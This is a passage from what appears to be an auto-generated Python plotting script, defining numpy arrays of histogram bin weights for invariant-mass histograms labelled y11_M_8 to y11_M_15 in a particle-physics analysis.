00404708548515,0.000486062836751,0.000648012955201,0.000405672101381,0.000324205600334,0.000242644017003,8.10351575148e-05,0.000405228279281,0.000161956404882,0.000242572980321,0.000243171291488,0.000243245628546,0.000243329080931,0.000162004181765,8.10674854915e-05,0.000404377882191,8.07223132259e-05,0.000567265779136,8.10351575148e-05,0.000243087996264,0.000243297963093,0.000567595659656,0.0,0.0,0.0,0.00016182454697,8.10323129044e-05,8.11512364819e-05,8.10674854915e-05,0.000161913028501,0.000242885730314,0.000161695989436,8.12819471194e-05,0.0,0.000161943832018,8.09672483331e-05,0.000323664024217,0.000242968082573,0.000161716106018,0.0,8.11095102894e-05,0.000161883167949,0.0,8.09353289745e-05,8.12819471194e-05,0.0,8.09917025536e-05,0.0,8.10966231038e-05,8.08337245172e-05,0.0,0.0,0.000162031999227,0.000242803220894,0.0,0.0,8.10674854915e-05,8.12074843323e-05,8.09938713726e-05,0.0,0.0,0.0,0.000162076632894,0.000162257210653,0.0,8.11512364819e-05,0.0,0.0,0.0,0.0,8.12819471194e-05,0.0,0.0,0.0,0.0,8.09776209459e-05,0.0,0.0,0.0,8.09752321017e-05,0.0,0.0,8.09211845025e-05,0.0,8.10323129044e-05,8.12819471194e-05,0.0,0.0,0.0,8.10351575148e-05,0.0,0.0,0.0,0.0,8.1053262439e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00024253746198,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.11095102894e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000162118437667,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.07223132259e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.09211845025e-05,0.0,0.0,0.0,0.0,0.0,0.0,8.09353289745e-05,0.0,8.09353289745e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.09211845025e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_8
y11_M_8_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000744750488793,0.00031606157265,0.000851153040779,0.000426169087221,0.000425326731364,0.000319630392978,0.000425990793761,0.00053206721683,0.000106609744353,0.000424260088795,0.00053098359128,0.000319377207357,0.000426359630699,0.000532957125034,0.000319709795374,0.000106683411514,0.000106381838317,0.0,0.000635178522784,0.000425045537745,0.000633459622381,0.000319224193482,0.000319303595878,0.000533150285562,0.0,0.000206924593681,0.000531889535872,0.000319373420987,0.000639106324352,0.000425862168561,0.000213219488707,0.000106312013208,0.000425724021755,0.0,0.000531245073505,0.000212301795233,0.000106490250986,0.0,0.000426194311124,0.000106609744353,0.000106530341957,0.0,0.000213060739596,0.000212763620952,0.000106490250986,0.000105748233922,0.000314394901874,0.000212842355165,0.000319253927619,0.000106490250986,0.000319555500816,0.000319709795374,0.000106312013208,0.000209679734333,0.000106381838317,0.000106490250986,0.0,0.0,0.000106683411514,0.0,0.0,0.0,0.000213100051021,0.000212802264194,0.000106609744353,0.000106609744353,0.00021299158267,0.000106530341957,0.000213219488707,0.000106683411514,0.0,0.0,0.0,0.0,0.0,0.0,0.000106683411514,0.000106312013208,0.000106490250986,0.000106490250986,0.000106683411514,0.0,0.000213213753471,0.0,0.000106683411514,0.000212559268361,0.0,0.0,0.0,0.000319184102511,0.000106609744353,0.0,0.0,0.0,0.0,0.0,0.0,0.000212357978275,0.0,0.000106609744353,0.0,0.000106683411514,0.000106312013208,0.000106530341957,0.0,0.0,0.000106683411514,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106683411514,0.000106381838317,0.0,0.0,0.0,0.0,0.0,0.000106683411514,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000104897748507,0.000106490250986,0.000106609744353,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106381838317,0.0,0.0,0.000106312013208,0.000105609363251,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106609744353,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106312013208,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106381838317,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_9
y11_M_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_10
y11_M_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,3.94542685761,0.0,0.0,0.0,0.0,0.0,3.95485645769,0.0,0.0,3.948593127,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_11
y11_M_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,2.59425860808,3.45120407328,0.864634129954,4.31990387508,2.59191408121,0.863198449487,2.59033617284,2.5918060053,1.72706898707,0.864459479274,2.59052782746,2.58684892329,3.4537561059,2.59467073757,1.72795665059,0.0,2.58954938017,3.46022336871,0.0,0.864919594473,0.864704019046,2.59014740024,1.72942648305,2.5899298074,0.0,1.72794079946,0.0,0.0,0.863850651614,2.58957964143,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.863850651614,0.0,0.0,1.72703152075,0.0,0.864244912555,0.0,0.865024356061,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.865320916374,0.0,0.0,0.0,0.0,0.0,0.863198449487,0.862434424812,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.864105998978,0.0,0.0,0.864567266987,0.0,0.0,0.861387385339,0.862982009453,0.862321737657,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.865024356061,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.864823767161,0.0,0.0,0.0,0.862982009453,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.862575644009,0.0,0.0,0.0,0.864634129954,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.862575644009,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_12
y11_M_12_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.34896582829,1.86898344739,1.86894161393,2.38869063335,1.03879134187,1.87031202041,1.45374595425,2.07710491676,1.34973037086,0.934535865208,1.34956015194,1.03813513354,1.24601613263,1.03823163901,1.45378057505,0.831075224312,0.830509607066,0.726489407563,0.934591546987,0.935020844851,0.51921643619,0.830804028081,0.623246300665,0.622353516902,0.62320735227,1.1427085445,0.518947548012,0.415275864517,0.311431509804,0.72648450295,0.103848523633,0.311916200941,0.31151748478,0.415230568976,0.415395594768,0.207617015528,0.20732115198,0.103514317555,0.103720066057,0.727052861009,0.31192139406,0.311666209947,0.415670253078,0.311650486336,0.103827477075,0.104014963108,0.207666927175,0.518507575403,0.103826525003,0.208085983053,0.41571165378,0.103644491745,0.103720066057,0.207587587852,0.41599063969,0.519842062815,0.207545177377,0.103848523633,0.208078770387,0.207504497943,0.519833263363,0.103587857894,0.0,0.207784782133,0.311333417551,0.0,0.103848523633,0.0,0.103733294086,0.0,0.0,0.103957247356,0.103651920791,0.207735014739,0.103514317555,0.103966739225,0.0,0.0,0.0,0.0,0.103973980741,0.0,0.103942172885,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.208085117533,0.103957247356,0.103587857894,0.207348848616,0.104111973461,0.0,0.103587857894,0.103811681337,0.0,0.103990151537,0.0,0.103720066057,0.0,0.103643063638,0.0,0.0,0.103827477075,0.0,0.0,0.0,0.207341780204,0.0,0.0,0.103651920791,0.0,0.103848523633,0.103733294086,0.103973129646,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103857640443,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.104014963108,0.0,0.0,0.0,0.0,0.103761062849,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103643063638,0.103811681337,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103514317555,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103896978322,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103973980741,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.103848523633,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_13
y11_M_13_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.756346970759,0.453765624568,0.378372164716,0.416029750489,0.377899931471,0.416099390668,0.490899771082,0.339935109612,0.264606283129,0.453461119469,0.378128651669,0.226445057756,0.302663730979,0.453906042839,0.378073121591,0.264763997653,0.491565221688,0.264649523763,0.11351453971,0.378474576745,0.188864098939,0.226753500029,0.113510283921,0.15129087792,0.226959644064,0.151092767539,0.0377751320238,0.0755456668855,0.340275800295,0.0755950522416,0.226987022213,0.0756128719346,0.18887101744,0.113541508211,0.0,0.113362196127,0.0756181063272,0.0756100043978,0.0377751320238,0.113428627397,0.0,0.189087106821,0.0378457052908,0.11314246543,0.113349337728,0.0,0.0755950522416,0.0,0.0378457052908,0.0,0.0756897037145,0.0755977377126,0.0,0.0756937774375,0.0378751771969,0.0,0.0755653527532,0.0377751320238,0.0,0.113382860599,0.113337548966,0.0378875576733,0.0,0.0754677199524,0.0378656870156,0.0,0.0378199202178,0.0378575850862,0.075703290377,0.0755870641034,0.113606619503,0.0378751771969,0.188823088611,0.0756128719346,0.0378457052908,0.0,0.0378575850862,0.0,0.0756128719346,0.0755269368633,0.0,0.0,0.0756986932149,0.0378751771969,0.0,0.0,0.0,0.0376999615946,0.0378656870156,0.0378656870156,0.0,0.0,0.0,0.0,0.0,0.0378738572197,0.0378738572197,0.0,0.0,0.0,0.0,0.0378111355415,0.0,0.0,0.0,0.151322079451,0.0,0.0376688283378,0.0,0.0,0.0,0.0,0.0,0.0378738572197,0.0,0.0,0.0,0.0378875576733,0.037588218692,0.0,0.0,0.037802123283,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0377222874169,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378738572197,0.0,0.0,0.0376610905401,0.0,0.0,0.0,0.0378738572197,0.0377751320238,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.037588218692,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0756835134764,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378199202178,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378751771969,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378656870156,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_14
y11_M_14_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.190964039793,0.169597734608,0.201653107833,0.201615739522,0.148457803471,0.201531047638,0.201594241923,0.159113543018,0.0954323301437,0.116722326066,0.116760935177,0.190982507529,0.116757905314,0.116780932272,0.0955129822107,0.0743278628317,0.0530953044552,0.0848102653599,0.159123354003,0.106183596942,0.0953661925632,0.063633153476,0.127196620103,0.0318731486082,0.0636903168909,0.106126837509,0.0318439176444,0.0318519828511,0.0954455605454,0.106124572325,0.0318471206424,0.0530263822863,0.0424427101949,0.053074513824,0.116633998346,0.0530612401385,0.0636799432172,0.0530330768407,0.0530580082847,0.0106140515176,0.0424617550479,0.0318659057929,0.0212528728864,0.0955286220748,0.042423997184,0.0636930870513,0.0106015641537,0.0212211891764,0.0105821456176,0.0424380066933,0.021214321487,0.031813546875,0.0212102960976,0.0318212369558,0.0318128543349,0.0212004129731,0.0212118687407,0.0318383484677,0.0318601779091,0.031838997724,0.0212179717505,0.0211761019296,0.0212312598638,0.0106129549957,0.0212269026323,0.0212239593368,0.0212042219437,0.0212083483285,0.0106358549887,0.0211853790815,0.010603038687,0.0105803536701,0.0211871681435,0.0212512281037,0.0105942592983,0.0106358549887,0.0106129549957,0.0106161680933,0.0318525888237,0.0,0.0106200564174,0.0,0.0106015641537,0.0105969760755,0.0318390265799,0.0318308603778,0.0106140515176,0.0,0.0106079629358,0.0106130285781,0.0106200564174,0.0212117533174,0.0106358549887,0.0106079629358,0.0,0.0105954005467,0.0,0.0317777079243,0.010603038687,0.0106140515176,0.0105880480792,0.0,0.0106163599846,0.0,0.0,0.0,0.0106129549957,0.0,0.0,0.0,0.0,0.0105942592983,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106099107048,0.01058841022,0.0,0.0,0.0,0.0105969760755,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.010603038687,0.0,0.0,0.0106050196403,0.021233727038,0.0,0.0106163599846,0.0106200564174,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0105969760755,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0105880480792,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106290507821,0.0106131339019,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106130285781,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0105803536701,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_15
y11_M_15_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0227754472451,0.0114364412895,0.00570356146684,0.0114648244717,0.00565686040638,0.0114096758245,0.00575000989748,0.00569557038665,0.00570610992558,0.0,0.0,0.0227551748098,0.0228405991468,0.0115222157626,0.0114107927143,0.0,0.00567245254178,0.00570356146684,0.0114068703039,0.0,0.0,0.00579528825314,0.00571859958947,0.0114194264493,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0114668721029,0.0,0.00567932673223,0.00576110788128,0.0171053525816,0.0,0.0,0.0,0.0115635938683,0.00570977527407,0.0,0.0,0.00570610992558,0.0,0.0,0.00570723124743,0.00569557038665,0.0114618416669,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0172332364573,0.0,0.0,0.0,0.0,0.0170501995024,0.0,0.0,0.0,0.0,0.0,0.0,0.00571686220542,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.